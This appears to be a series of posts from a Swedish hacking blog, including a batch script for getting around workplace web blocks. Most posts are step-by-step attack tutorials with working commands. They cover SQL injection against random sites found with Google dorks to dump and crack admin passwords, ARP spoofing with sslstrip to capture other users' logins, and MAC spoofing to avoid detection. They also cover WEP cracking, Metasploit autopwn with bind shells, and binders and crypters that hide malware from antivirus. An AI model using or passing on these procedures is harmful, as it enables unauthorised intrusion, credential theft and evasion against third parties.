Stats

För er som vill se lite siffror.

Mvh/

Ninja

Generös liten ninja

Hej alla it ninjor!

Står det bra till? tänkte väl det :)

Nu är det så att många är väldigt spärrade på jobbet, alltså att man inte kommer ut på dom hemsidor man vill och så vidare.

Nu är det så att på mitt förra jobb så var det exakt så! 

Och självklart så vill man ju kunna surfa iväg till facebook, Google + eller någon annan tjänst!

Det var så att vi satt på äckliga windouche datorer (Om ni inte redan märkt det så håller jag mig till linux  : > )

Så då skrev jag ihop ett litet enkelt .BAT script som jag har tänkt dela med er!

Jag skrev ihop det på 2 minuter och det använder en proxy som surfar ut på sidorna med proxyn automatiskt!

Jag har gjort den så att den är bara att starta ( den heter "ninjafish webmaster.bat" )

och sen välja sitt val och därefter trycka på ENTER :)

Simpelt som fan!!!

Och för er som vill ta en titt närmare på den så har jag låtit den vara öppen så ni kan ändra den exakt hur ni vill!

Frihet! :)

Om det är något ni behöver hjälp med eller undrar något så kan ni lägga till mig under namnet " Ninjafish@jabber.org "

Två stycken mirrors ni kan ladda ner ifrån.

2 shared nerladdningslänk

Media fire nerladdningslänk

Ha så kul! 

Ni använder det på egen risk, så kommer eran chef och skäller på dig för att du surfar till ställen du inte får så skyll inte på mig  ^^

MvH /

Ninja! :)

|||||||||||||||||||||||||||||||||||||||||||||||| PASTE PÅ KODEN ||||||||||||||||||||||||||||||||||||||||||||||||

@echo off

title WEBMASTER by: NinjaFish

color fc

cls

:start

echo.

echo 1. FACEBOOK

echo 2. google

echo 3. Flashback

echo 4. Windows hotmail

echo 5. Komplett

echo 6. Youtube

echo 7. Fuck it I'm Done

echo 8. Clean trace?

echo: ______________________________________

echo:                WELCOME!

echo:  This is a simple .bat script that will

echo:  make you go around "blocked" websites!

echo:  I use an proxy so it wont harm the

echo:  computer, it no installation and it´s

echo:  free for everyone to use.

echo:  If you going to change the code or

echo:  share this. be sure to give ALL

echo:  CREDITS TO ME!  Ninjafish@jabber.org

echo.

set /p x=Pick:

IF '%x%' == '%x%' GOTO Item_%x%

:Item_1

cls

echo   YOU 

echo        PICKED

echo                 FACEBOOK

echo                             THANKs NINJAFISH!

start http://www.flyproxy0.appspot.com/http/facebook.se

GOTO Start

:Item_2

cls

echo   YOU 

echo        PICKED

echo                 GOOGLE

echo                             THANKs NINJAFISH!

start http://www.flyproxy0.appspot.com/http/google.se

GOTO Start

:Item_3

cls

echo   YOU 

echo        PICKED

echo                 FLASHBACK

echo                             THANKs NINJAFISH!

start http://www.flyproxy0.appspot.com/http/flashback.org

GOTO Start

:Item_4

cls

echo   YOU 

echo        PICKED

echo                 HOTMAIL

echo                             THANKs NINJAFISH!

start http://www.flyproxy0.appspot.com/http/live.se

GOTO Start

:Item_5

cls

echo   YOU 

echo        PICKED

echo                 KOMPLETT

echo                             THANKs NINJAFISH!

start http://www.flyproxy0.appspot.com/http/www.komplett.se

GOTO Start

:Item_6

cls

echo   YOU 

echo        PICKED

echo                 YOUTUBE

echo                             THANKs NINJAFISH!

start http://www.flyproxy0.appspot.com/http/youtube.se

GOTO Start

:Item_7

exit

:Item_8

@echo off

echo  -------------------------------------------------

echo  [                                             0 ]

echo  -------------------------------------------------

ping localhost -n 2 >nul

cls

echo  -------------------------------------------------

echo  [][][]                                       10 ]

echo  -------------------------------------------------

ping localhost -n 3 >nul

cls

echo  -------------------------------------------------

echo  [][][][][]                                   20 ]

echo  -------------------------------------------------

ping localhost -n 3 >nul

cls

@echo off

echo  -------------------------------------------------

echo  [][][][][][][][][][][]                       50 ]

echo  -------------------------------------------------

ping localhost -n 3 >nul

cls

echo  -------------------------------------------------

echo  [][][][][][][][][][][][][][][][]             70 ]

echo  -------------------------------------------------

ping localhost -n 3 >nul

cls

echo  -------------------------------------------------

echo  [][][][][][][][][][][][][][][][][][][]       80 ]

echo  -------------------------------------------------

ping localhost -n 3 >nul

cls

echo  -------------------------------------------------

echo  [][][][][][][][][][][][][][][][][][][][][][][][]]

echo  -------------------------------------------------

ping localhost -n 3 >nul

echo  100% done!

echo ||||||||||||||||||||||||||||||||||||||||||||

echo  DONE!

echo ||||||||||||||||||||||||||||||||||||||||||||

echo  press any buttom to clear and close.

pause

cls

exit

Upp till er

Känner att det skulle vara på tiden att skriva ett inlägg.

Dock är det så att det är upp till er vad ni vill lära er.

Posta något i kommentarerna så visar jag det och går igenom det.


För er som undrar vart jag har tagit vägen så...

Har jag varit upptagen i arbete under sista tiden så det är därför jag inte har skrivit eller uppdaterat bloggen, känner att vi ska börja rulla igen så nu kör vi!

MvH

/Ninja :*

Lär er grunder!

Det är bättre att ni som läser detta lär er lite grunder innan man går vidare.

http://sv.wikipedia.org/wiki/N%C3%A4tmaskadress
http://sv.wikipedia.org/wiki/Ipadress
http://sv.wikipedia.org/wiki/Gateway
http://sv.wikipedia.org/wiki/DNS
http://sv.wikipedia.org/wiki/DHCP
http://sv.wikipedia.org/wiki/WLAN
http://sv.wikipedia.org/wiki/Wardriving
http://sv.wikipedia.org/wiki/Tcp
http://sv.wikipedia.org/wiki/Subn%C3%A4t

Class A 1.0.0.1 to 126.255.255.254 Supports 16 million hosts on each of 127 networks.
Class B 128.1.0.1 to 191.255.255.254 Supports 65,000 hosts on each of 16,000 networks.
Class C 192.0.1.1 to 223.255.254.254 Supports 254 hosts on each of 2 million networks.



LÄS PÅ!


MvH

/Ninja

Jaha.. virus?

Så det är skadlig kod ni vill lära er?
För er som vill läsa lite runt detta så kolla detta

Vad är en trojan?

Ett trojanskt dator virus är till som en "bakdörr" som man kan utnyttja för att för att få tillgång till dator utan användarens vettande tex.

Vad är en keylogger?

Precis som det låter, ett program för låter dig spara nycklar i bakhål.
Så det en keylogger gör är att att den gömmer sig i bakrunden och samlar ihop det användaren skriver och skickar det till den som gjorde virus eller hur man nu bestämmer det.

NOTERA att alla olika virus har olika funktioner och kan variera sig från virus till virus,

Vad är en RAT?

detta är nog mitt "Favorit" virus (om man nu kan ha det)
R.A.T står för Remote Administration Tool, och det är simpelt.
ett virus som är en blandning mellan en trojan och en keylogger i stort sätt.
Alltså det är ett virus som du kan ta kontroll över den andras dator eller den kan fungera som en keylogger likaväl.

||||||||||||||||||||||||||||||||||
!NOTE!
LADDA ALDRIG HEM NÅGON FIL ELLER KLICKA PÅ NÅGON LÄNK SOM NI INTE KAN LITA PÅ, OCH SKA NI FÅ TAG PÅ ETT PROGRAM SOM NI KAN GENERERA ERA EGNA VIRUS I SÅ LADDA INTE HEM DOM FRÅN STÄLLEN ELLER LÄNKAR SOM ÄR KONSTIGA, FÖR DOM INNEHÅLLER OFTAST SJÄLVA VIRUS
||||||||||||||||||||||||||||||||||



Har du några rekommendationer Ninja?

Jag skulle föreslå att ni prövar detta. fungerar till 100% och är virus-fritt

Men hur får dom som gör virus dom det osynligt från sitt AV? (AntiVirus)

Dom använder antingen en Binder eller en crypter av något slag.

En crypter säger nästintill säg själv och en "Binder" är ett program som tex. sätter ihop en bild med en EXE fil A.K.A ditt virus.

Är det något speciellt ni vill jag ska gå in på mer så lämna en kommentar bara så fixar jag det!

MvH

/ Ninja ;D

Du bestämmer!

Nu lämnar jag detta åt er ;) ni säger vad ni vill vill lära er så går jag igenom det :)


MvH

/Ninja

äntligen!

Efter mycket om och men och bråk med älskade google så är jag tillbaka!!!

Meddela era nördar och vänner ätt jag Kommer igång igen!

Så skriv lite om vad ni tycker och så :) fan vad förr detta ska bli!

Mvh

/ninja - den ändå tjejen på Internet!

/CIHT/

Jag har blivit avstängd.
Drf jag inte har kunnat uppdaterat. min "blogg" har vart under koll.

Alltså jag kommer förmodligen inte kunna ha kvar min blogg för att visa tycker jag utför olagliga saker på denna sida. så tyvärr jag får återkomma när dom har gjort klart sin utredning.



Bye så länge m8s.

MvH/

Ninja

Problem

internet och dator problem...
hårddisk problem igen och internet fungerar inte riktigt som det ska.

Jag tar en "semester" från bloggen ett tag och återkommer den 31 tisdag.

Beklagar om ni förväntade er något just nu, lovar att lägga upp det iaf!

Ha det bra tills dess!

MvH/
Ninja

Tackar alla..

Jag tackar alla som har hjälpt mig och uppskattar den hjälp jag har fått hittills.
Som tack kommer jag visa en SQL-injection (Video) som kommer in i det här inlägget lite senare eftersom jag ska se till att det blir lite bra också :)

Frågor och funderingar tas gladligen emot och lämna gärna en kommentar om hur ni tycker sidan kan förbättras eller uppdateras.  vill veta vad ni alla tycker :)

MvH/

Ninja :)

Metaspl0it

Idag ska vi gå igenom metasploit.
Metasploit är ett säkerhetsverktyg som hittar svagheter, vi kommer använda det för att hitta säkerhetshål i måldatorn.

Vad behöver vi för det här? vilka os fungerar den på?
Den fungerar på Olika linux distributioner (Finns redan i backtrack) och även för windows för dom som vill testa där :) (notera att om du är windows användare måste du avaktivera ditt antivirus)

Alla kan besöka deras hemsida http://www.metasploit.com/
Läs lite innan ni börjar så ni får en uppfattning om vad vi kommer göra!

För er på ubuntu och windows kan ladda hem programmet från deras hemsida, på windows är det bara att avaktivera antivirus och på linux behövs det lite mer men allt står på deras hemsida.

Hela programmet är i text form och inte i grafiskt gränssnitt.

När ni väl har installerat det så kan ni starta upp det. ( skriv "msfconsole"  i backtrack för att starta, och i ubuntu är det oftast sökvägen sen ./msfconsole, det kan variera hur ni har det men allt står på deras hemsida)

GLÖM INTE ATT VARA ROOT NÄR NI BÖRJAR MED ALLT!

vi kommer börja med att uppdatera metasploit
* svn update
* msfupdate
det skriver ni i metasploit fönstret.

Förhoppningsvis har allt gått bra annars rekomenderar jag er att Googla eller att söka på något forum, ni måste lära er att klara av saker själva! :)

tänk att en Payload är en instans på måldatorn som går att aktivera och en exploit är det säkerhetshålet som gör att vi nu kan aktivera det.
 det är kanske inte riktigt är det, men så att ni kan förstå så är det ett bra exempel.

Show options = visar alternativ

om ni ska använda en viss payload så kan vi skriva:
set PAYLOAD generic/shell_bind_tcp (då använder vi generic/shell_bind_tcp payloaden)
om vi vill använda någon annan payload så skriv bara "show payloads" så får ni se alla.

set RHOST = då sätter vi måldatorns ip tex,  Exempel: set RHOST 192.168.0.5
set LHOST = lokala ip:n, exempel: set LHOST 192.168.0.4
set LPORT = porten som vi väljer som Payloaden kommer öppna . exepel: set LPORT 443
exploit = du aktiverar det hela i stort sätt.

Vi tar som ett exempel:

set RHOST 192.168.0.5
set LHOST 192.168.0.4
set LPORT 443
set PAYLOAD generic/shell_bind_tcp
exploit

ni kan använda olika exploits och olika payloads, bara att utforska och försök mesta del på egen hand. (så ni lär er)

Kommer även visa er ett enklare i nästa inlägg (imorgon) och kanske effektivare sätt men vill att ni ska förstå det ovan innan jag visar nästa steg.


||||||||||||||||||||||||||||||||||||||||   EDIT|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Det är inte så himla säkert att man hittar något säkerhetshål om nu den du attackerar har bra antivirus + uppdaterat system.
Vilket inte kommer resulterat några sårbarheter.

Däremot! istället för att skriva och pröva alla olika 300 sårbarigheter (payloads/exploits)
så kan vi köra alla i en enda instans, enkelt och effektivt.

Låt oss säga att vi sitter i ett lokalt nätverk.
Först så skapar vi en datorbas (vilket ni kan ta bort om ni vill efter ni är klara)

db_create "namn"    

sen väljer vi våran "driver" vilket kommer vara:

db_driver sqlite3

Nu kan du (om du vill och behöver) öppna ett till terminal fönster och köra nmap så du kan se alla datorer i nätverket. (se tidigare inlägg för beskrivning för nmap)

Välj vilken ip du ska köra attacken mot och skriv (i metasploit fönstret) nmap "ip:n du valt"

tex: nmap 192.168.0.76

sen skriver du simpelt nog:

db_autopwn -p -t -e

så kör du alla tänkbara sårbarheter mot den ip du skrev.

Det ska vara allt och skriv i kommentarerna om du behöver hjälp


|||| EXEMPEL||||||||||||||||

db_create hej
db_driver sqlite3
db_nmap 192.168.0.65
db_autopwn -p -t- e

sessions -i

(om du lyckas ser du det och kan gå vidare genom "sessions")
(som jag skrivit förut att ni kan hjälpa mig att hålla uppe bloggen genom att trycka upp min reklam på sidan i nya flikar och låta dom vara där ett tag sen stänga dom, det hjälper mig jätte mycket och tackar alla som stödjer mig)

MvH/

Ninja :)

Vad vill du lära dig?

Skriv i kommentarerna vad du vill lära dig så  köra jag en guide på det.

MvH/

Ninja

Hur går det för alla? lite respons!
La ner mycket info i sista posten!!

Stöd gärna mig med det jag skrivit i föregångna inlägg (reklam och stöd)

MvH/

Ninja

MySQL Injection -

MySQL Injection är den allra vanligaste metoden för att hacka hemsidor, för att detta ska fungera
så behövs det dock att hemsidan som ska hackas kör MySQL.
MySQL Injections går ut på att du skickar in kommandon till databasen för att få ut den data du vill åt,
som t.ex användare på sidan, admins eller vad som helst.
Mitt tips till dig är att börja lära dig om MySQL redan innan du påbörjar de olika steg i denna guide
eller under tiden så att du vet vad som händer och vad de olika kommandona gör.

För att hitta en random sida att pröva detta på så kan man använda sökmotorn google och ange olika
google dorks, som t.ex:
* inurl:index.php?newsID=
* inurl:index.php?productID=
* inurl:index.php?articleID=
* inurl:index.php?fileID=

etc.

För att kolla om sidan är sårbar för SQLi (Förkortning för MySQL Injection), så kan du sätta dit
' i slutet av länken efter ID= dvs, eller så kan du testa and 1=2.
Ungefär såhär:
http://URL.com/index.php?newsID=1' eller
http://URL.com/index.php?newsID=1 and 1=2

Om sidan laddas upp med ett SQL error eller om sidan laddas konstigt så kan det vara en sårbarhet
som kan utnyttjas.

Sedan så måste vi räkna antalet kolumner, sudda ut ' eller and 1=2 och skriv in order by 1-- efteråt,
då bör det se ut såhär:
http://URL.com/index.php?newsID=1 order by 1--

Om sidan laddades normalt som den ska, så är det bra, testa sedan att ändra värdet från 1 till 99,
laddas sidan konstigt eller om du får ett error som som säger att kolumen 99 inte finns så ändra värdet
till 2 och fortsätt uppåt tills sidan laddas konstigt.
Värdet på siffran som sist gjorde så sidan laddades normalt är den vi är ute efter, låt oss säga
att sidan slutade laddas normalt vid värdet 7.
Då finns det 7 kolumner.
http://URL.com/index.php?newsID=1 order by 1-- <- normalt
http://URL.com/index.php?newsID=1 order by 2-- <- normalt
http://URL.com/index.php?newsID=1 order by 3-- <- normalt
http://URL.com/index.php?newsID=1 order by 4-- <- normalt
http://URL.com/index.php?newsID=1 order by 5-- <- normalt
http://URL.com/index.php?newsID=1 order by 6-- <- normalt
http://URL.com/index.php?newsID=1 order by 7-- <- normalt
http://URL.com/index.php?newsID=1 order by 8-- <- onormalt/error

Sedan så gör ett mellan rum mellan = och id:
http://URL.com/index.php?newsID=-1

Sedan efter 1:an skriv union select 1,2,3,4 etc tills antalet kolumner som fanns på sidan,
på denna sida fanns det 7 kolumner som vi kunde konstantera tidigare:
http://URL.com/index.php?newsID=-1 union select 1,2,3,4,5,6,7--

Tryck sedan enter, då bör det komma upp små siffror på sidan, låt oss säga att siffrorna 3 och 5 kom upp,
då skriver vi concat(table_name,0x3a,column_name) på någon av 3 och 5.
http://URL.com/index.php?newsID=-1 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7--

Sedan efter 7 skriver vi from information_schema.columns where table_schema=database()-- :
http://URL.com/index.php?newsID=-1 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7 from
information_schema.columns where table_schema=database()--

Enkelt sagt vad detta gör är att den ger oss vilka tables och columns som finns i databasen
information_schema.

Efter detta så bör det ha kommit upp t.ex
users:user_id
För att bläddra skriv limit 0,1 innan -- och ändra värdet på 0:an så kommer det upp annan data som kan
vara dig till lags:

http://URL.com/index.php?newsID=-1 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7 from
information_schema.columns where table_schema=database()limit 0,1--
http://URL.com/index.php?newsID=-1 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7 from
information_schema.columns where table_schema=database()limit 1,1--
etc.

För att lista alla alternativ ändra concat(table_name,0x3a,column_name) till group_concat(table_name,0x3a,
column_name).
Leta sedan efter den information som kan vara dig till lags, t.ex som
users:users_id
users:password
users:username

Eller
admin:admin_id
admin:username
admin:password

Vi säger att vi vill åt admin-kontona, då ändrar vi table_name i concat till username,
och columns_name till password, och sedan from information_schema.columns where table_schema=database()--
till from admin-- :

http://URL.com/index.php?newsID=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7 from admin--
Då bör du ha fått upp ett/flera av adminkontona, för att bläddra om endast ett resultat visas använd
limit här igen.
De flesta är sidor som du kommer stöta på så kommer lösenorden vara md5 hashade, för att få tag på lösenordet
så kan du använda denna sida:
http://hash.insidepro.com
Skriv in hashen i rutan och sedan verifiationskoden och tryck search.

Sedan är det bara att hitta admin sidan, för att hitta admin sidan så kan du använda detta verktyg som är
kodat i perl:
http://ankfest.com/DOWNLOADS/ludwig.pl, för att scriptet ska fungera så måste du ha perl installerat
på datorn.
Annars finns ett program som heter adminfinder, som jag dock inte har orkat leta upp ännu.

Sedan är det bara logga in med valfritt admin-konto på sidan och göra vad fan du vill.

MvH/

Ninja

Extra skribent sökes

Som rubriken lyder, jag söker en extra skribent för jag inte har så mycket tid längre att ägna åt bloggen.

Så om det finns någon kunnig, det måste vara en seriös person som jag kan lita på.
Lämna förslag eller frågor i kommentarerna.

MvH/

Ninja

Ettecap och wireshark

Idag ska vi göra en  MITM attack eller snarare en man in the middle attack.

först och främst ska ni lära er vad det är (annars ser jag ingen mening med detta) http://en.wikipedia.org/wiki/Man-in-the-middle_attack

Läs på och pröva.

Vi kommer använda oss av "ettercap" och om ni vill "wireshark".

ettercap är ett jätte bra "paket-fångar-verktyg" som vi/ni kommer gilla.

wireshark är i stort sätt detsamma men utför inte "arp poisonin" (och i GUI) 

Ettercap och Wireshark finns i backtrack och i ubuntu är koderna simpla:

sudo apt-get install wireshark

sudo apt-get install ettercap

 (ettercap kan behöva något extra packet om det inte fungerar, skriv i kommentarerna om det verkligen behövs)

När ni skriver så tänk på att det är skillnad mellan ett stort T från ett litet t, då dom har olika meningar.

-T = Text (så ni får med text helt enkelt i aktiva loggen)

-P = Plugin, det finns flera pluggins i ettercap och dom kan vara nödvändiga ibland

-M = mitm

-q = silent mode (skriv ettercap --help om ni vill läsa mera om kommandona)

ARP = arp poisonin, behövs om du ska göra en effektiv sniffning

// = är till för gateway såväll som ip. lite svårt att förklara men ni kan tillexempel skriva "ettercap -T // //" då skannar ni hela nätverket efter alla dom 255 platserna som finns, skriver ni däremot "ettercap -T /192.168.0.1/ /192.168.0.64/" så sitter ni imellan "192.168.0.64" datorn och routern.

-i = interface, tex "ettercap -T -i wlan0"

Som fullt exempel:

Ettecap -T -i eth0 -M arp // // 

då skannar vi hela nätverket efter paket och kör det i Text-mode och använder oss av Interfacet eth0 vilket är min nätverksport för lan sladden.

skriv bara wireshark så startas det, välj vilket interface du ska använda dig av och kör på.

du kan också filtrera så du ser tex bara http trafik eller bara msn konversationer ;) hehe

för att filtrera så du bara ser http trafike skriver du bara "http" uppe i inboxen.

för msn paket skriver du "msnms" vilket du får upp ett gäng paket som du sen får klicka upp för att sen läsa av paketen.

Happy hunting!

MvH/

Ninja :)

Lördag apr 23

Hoppas ni haft det bra nu i påsk och hoppas ni det gått bra att läsa den här bloggen!

Idag vill jag helst se så att ni lärt er lite ifrån den senaste posten och ni kan väl skriva i kommentarerna vad som kan förbättras med bloggen och vad ni lärt er hittills och vad ni tycker om det jag gör :)

MvH/

Ninja

(P.S jag kommer förmodligen lägga upp ett till inlägg om det bara är tillräckligt många som svarar idag)

Fredag apr 22

Vad går vi igenom idag? jo vi ska lära oss hur vi "sniffar"
alltså vi ska lära oss hur vi avlyssnar datortrafiken mellan olika datorer osv.
Men först och främst!!

Återigen så förväntar jag mig stöd ifrån er och hoppas ni kan göra det igen :) (läs dom 2 föregångna posterna om du inte vet vad jag menar) Tack på förhand alla!

Vi kommer gå igenom en enkel typ av sniffing attack, vi kommer använda oss av "arpspoof" och "sslstrip"
er på backtrack har det redan, er på ubuntu  måste ni skaffa dom via apt-get install och sslstrip genoms deras hemsida ( se tidigare post )

Så vad vi kommer göra är att förgifta nätverket och göra så den skickar genom alla paket genom våran dator. Vi kommer snappa upp saker såsom Facebook konton msn konton osv, alltså i stort sätt alla som loggar in på något i nätverket kommer inte veta om att vi får deras information.

vi kommer skicka ett slags "gift" till routern så att vi kan få paketen.
Först och främst måste vi ändra 2 små saker.. så vi kan göra en "portforwarding"

kopiera och klistra in:
echo "1" > /proc/sys/net/ipv4/ip_forward

Kopiera och klistra in:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


Det här är ett måste om ni ska kunna lyckas : >


Och jag säger det igen att det inte är lagligt att göra det här på andras nätverk och jag kommer nu visa er ett sätt hur ni döljer eran Mac-adress så ni inte blir upptäckta, Ni får själv stå för om ni gör något ni inte får och jag ska inte stå för era dumma handlingar.


För att gömma eran mac-adress så skriver ni: 
ifconfig wlan0 down
macchanger -s wlan0
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
Det ni nu gör är att ni fejkar eran nuvarande adress till "00:11:22:33:44:55", ni kan ändra den hu ni vill det spelar ingen roll.


sslstrip är ett utmärkt verktyg och läs gärna om det från deras hemsida så satt säga http://www.thoughtcrime.org/software/sslstrip/

Det är till för att fånga diverse http-trafik.

ni skriver nu i terminalen:
sslstrip -w randomname
"randomname är bara output namnet för själva filen vi kommer lagra alla lösenord osv i"

Öppna en ny terminal och skriv föjlande:
arpspoof -i wlan0 192.168.0.1 exempelvis
"(-i står för interface och ni ska nu välja erat interface)
(192.168.0.1 är bara ett exempel och det ska stå eran gateway adress där vilket du kan hitta om du skriver "route-n")

nu ska ni ha 2 fönster upp varav ett är sslstrip och andra arpspoof.
Ta en kopp kaffe eller gå"ut och gå och låt det här köras ett tag. minst 10minuter för det längre du väntar dess bättre saker kan du snappa upp :D

när ni nu vill avsluta era saker så kryssa ner allt bara och öppna eran fil där ni sparade era saker (min var tex randomname)
öppna den med ett vanligt textprogram såsom "kate")
tryck sedan F3 eller CTRL+F så ni kan söka i det här överdrift länga textdokument, sökordet ska/kan vara "pass" för då hittar ni oftast både lösenord och användarnamn, annars kan ni skriva "user".

Det borde vara allt! lämna en kommentar och stöd mig som jag sagt från tidigare inlägg :)
Ha en förjävla bra fredag!

MvH/

Ninja ;)

Då fortsätter vi!

Vi börjar väl med att kunna knäcka WEP-nycklar tycker jag.

Vad kommer vi använda oss av och vilka är programmen?
aircrack-ng är det vi ska använda oss av och för er som sitter på backtrack har det redan och för er som sitter på ubuntu är det "apt-get install aircrack-ng"

Programmet "aircrack" är text baserat och är till för att knäcka nycklar som wep tex.
Det går också att knäcka WPA men eftersom det är en starkare kryptering så är det nästintill omöjligt att knäcka det.

När/om man ska knäcka WPA så fångar du en "handshake" och därefter gör ett försök till att knäcka krypteringen med en hjälp av en passwordlist, det är alltså så att lösenordet måste finnas i den listan för att det ska gå att knäcka.
Vi kommer nog inte gå in på det här med WPA knäckning på ett bra tag utan hade tänk att ta det vi ett senare tillfälle!

Men idag så ska vi ta en titt på wep krypteringar : )

Om ni sitter i ubuntu så glöm inte att göra er till SU innan ni skriver alla kommandon!!
Om ni är i backtrack så är det bara att köra på som vanligt.

Först öppnar ni en terminal och skriver "airmon-ng" för att se vilket interface ni kommer använda er av.
Ni ska sen starta erat interface så vi kan anvade det som "monitor mode" , vi skriver airmon-ng start "interface"
Tillexempel om ni använder er av wlan0 så ska vi skriva airmon-ng start wlan0

När ni fått igång erat interface så skriver vi nu "airodump-ng mon0" (notera att det inte behöver vara just "mon0" för er utan ni väljer det interface ni får efter ni skrivit airmon-ng start "interface")

Airodump är för att fånga närliggande nätverk och fånga upp vissa saker.

När ni skrivit exempel airodump-ng mon0 så ska alla trådlösa nätverk runt om er komma upp i fönstret.
Ni kommer också se vad dom har för krypteringar osv.
Nu ska ni kopiera BSSID:n och komma ihåg vilken kanal nätverket ligger på.
Channel number är det som ligger i spalten "ch" och kan variera från och vara olika och samma som andra nätverk, bssid är det långa nummret som kan se ut så här : 11:22:33:44:55 tex.

Jag tar för givet att ni gör det här i erat eget nätverk då det inte får göras i andras nätverk.

Vi ska nu "låsa" nätveket. (notera att vi kommer behöva informationen ifrån förra kommandot vi gjorde)

Airodump-ng -c 1 --bssid 11:22:33:44:55 -w wep mon0

GLÖM INTE ATT SÄTTA ERAT INTERFACE EFTER VARJE KOMMANDO, då den måste veta vilket kort den ska använda sig av.
(11:22:33:44:55 är bara ett exempel och ni tar det ni har)
 (1 är för kanal nummret och behöver inte vara 1 i erat tillfälle)
"-c" är vilken kanal vi kommer gå efter och då tar ni det från ovan.
"--bssid" för bssid:n som ni förhoppningsvis kopierade från ovan.
När jag skriver "-w wep" så är sjävla wep i det här tillfället namnet jag ger filen som vi kommer knäcka.


Om ni lyckas så har vi nu låst fast nätverket.
 då börjar ni attacken
Öppna en ny terminal och låt den första vara kvar!!
nästa steg är själva "attacken" och kommer utföras med kommando "aireplay-ng"
om ni behöver hjälp så skriver aireplay-ng -? eller aireplay-ng --help eller liknande.

Aireplay-ng -1 1 -a "bssiden" mon0
Tillexepel aireplay-ng -1 1 -a 11:22:33:44:44 mon0
 nu låter ni den här vara och öppnar ytligare en terminal.

Nu skriver ni aireplay-ng -3 -b "BSSID" mon0

Detta kan ta lite tid och ni får ha tålamod. ni ska ha exakt 3 fönster uppe och det ska/kommer rulla in massa saker i det senaste terminalen där vi skrev kommandot ovan.
Det kan ta upp till 10 minuter men brukar inte det.

Ni ska ha alla saker igång och ni ska kolla på det första fönstret där ni låste fast erat nätverk (airodump-ng fönstret) och kolla på där det står "data"

När ni har kommit upp i över 5000data ( det är det absolut minsta vi behöver) så kan ni pröva att knäcka det.
Ibland kan det behövas mera paket och då låter ni det vara tills ni är uppe i över 20000 data, annars är det bara att fortsätta : )

Sista kommandot för sjävla "knäckningen" är:
aircrack-ng wep-01.cap
 (om nu eran fil heter det)  skriv "ls" för att kolla efterfilen.

Den kommer sen gå igenom och förhoppningsvis hitta lösenordet.

Då kommer ni ha eran nyckel.

Återigen!! behöver erat stöd för att hålla igång bloggen så försök ska några som kan kolla min blogg.
och det som hjälper mig mest är att ni öppnar all min reklam på sidan i nya fönster och håller dom uppe i minst typ 10sekunder(om ni gör det varje dag så kommer jag kunna hålla igång sidan exakt hela tiden och kommer kunna vara extremt aktiv! )

Följ gärna bloggen om inte annat!
Tack för er som stödjer mig och imorgon kommer vi gå igenom hur du döjler din mac-adress ;)
(som "läxa" tills imorn ska ni kolla upp och lära er om vad en macadress är om ni inte vet det.

MvH/

Ninja :)

Bara att köra då!

Så nu är det så att jag låter er bestämma vad jag ska gå igenom till viss del!

Lämna en kommentar om vad ni tycker om det och vad ni vill lära er så kommer jag försöka gå igenom så många som möjligt!

Det ska köras på hårt nu under påsken ;)

                                        !Läs!
För att jag ska kunna fortsätta att köra bloggen och kunna lära ut så behöver jag mera personer som kollar till den här sidan och jag kommer ju ingenstans utan er.
Så nu ber jag er, varje gång ni kollar in min blogg (gärna dagligen :) ) så tryck upp mina aviseringar och lämna någon kommentar så kommer jag lyckas fortsätta med det här.
(uppskattar verkligen om ni "följer" bloggen med "följ" knappen uppe i hörnet)

Tack på förhand och lovar att jag kommer vara mer aktiv än förut!

Mvh/

Ninja

Ninja is back!

Jag vet att ni fått vänta men jag har inte kunnat gjort så mycket åt det.
Jag kommer fortsätta idag och se till att få bloggen rullandes igen :)
Däremot kommer jag inte ha filmen som jag sa förut eftersom hårddisken pajade.

MvH/

Ninja

Vad ska man göra.

jag vet inte riktigt hur jag ska göra... har ingen dator (sitter i skolan och skriver till er) så kan inte hålla igång bloggen -.-

Jag lovar att så fort som möjligt ska jag köra igång den igen och göra den som den skulle vara från början.

Sorry för att inte fått några inlägg..

Datorn är paj...

som rubriken lyder, jag får en ny hårdisk på måndag och kan därefter fortsätta den här bloggen därifrån.

efter dom här problemen är lösta så kommer allt att gå framåt som vanligt, ber om ursäkt för dom som tar illa upp men kan inte göra så mycket för tillfället...

tills på måndag behöver nu aircrack-ng.
Hjälp gärna varandra i kommentarerna!!

Ses på måndag alla!

MvH/

Ninja

Ajdå

Tyvärr upplever jag vissa stora datorproblem så kommer inte kunna göra det jag tänkt göra idag utan kommer däremot lägga upp en video imorgon (och text) på bloggen om att hacka trådlöst (helt på svenska)

Sitter på min kompis dator och försöker rädda filmen från min dator som ni skulle ha sätt idag.

Ber om ursäkt då jag inte heller kommer att kunna besvara på frågor idag...
Kommer fixa allt imorgon.

MvH/
Ninja

Torsdag

Vi kommer gå igenom alla program som jag sagt stegvis och kommer arbeta i eran takt.

!NOTERA!
Allt ni lär er är endast till för utbildningssyfte och ni har själva allt ansvar för det ni gör.
Och för all del, om ni ska pröva det här så gör det i erat eget nätverk!


Jag kommer senare idag (kl 3-5) lägga upp dagens uppgift och det ni kommer arbeta med idag.
Hämta hem "aircrack" om ni sitter på ubuntu.
apt-get install aircrack-ng
ni på backtrack har det redan.

Våran uppgift idag är att knäcka ett trådlöst nätverk med krypteringen WEP-

Och precis som jag bad er igår att göra (fortfarande inget tvång men kan vara hjälpsamt för mig)
så kan ni klicka upp reklamen och "följa" min blogg.

Tack på förhand och vi ses ikväll!

MvH/
Ninja

Dagens

Vill nu till en början utforskar programmet nmap.
Det är ett scannings verktyg.
För att kolla alla i ditt nätverk kan du tex. enkelt skicka ut "ping-request" till alla genom att skriva Nmap -sp "gatewayadressen" sen /24
Alltså tex.
nmap -sp 172.20.0.1/24 så får du se alla i nätverket.
skriv route -n så ser du din gateway.
Du ser då deras ip och macadress.
Använd mera avancerade kommandon som tex. nmap -sS -v -PN 172.20.0.1-255 (då kollar du igenom efter öppna portar i den andra dator och eventuella kryphål mm. ;) )

Ni ska utforska nmap och dess möjligheter.
som om du tex. skulle köra "nmap -sP 172.20.0.1/24  (då ser du alla andra datorer och enheter så som laptops eller iphones och liknande i nätverket du sitter i)
och du kanske vill veta mer om just enheten "172.20.0.157"
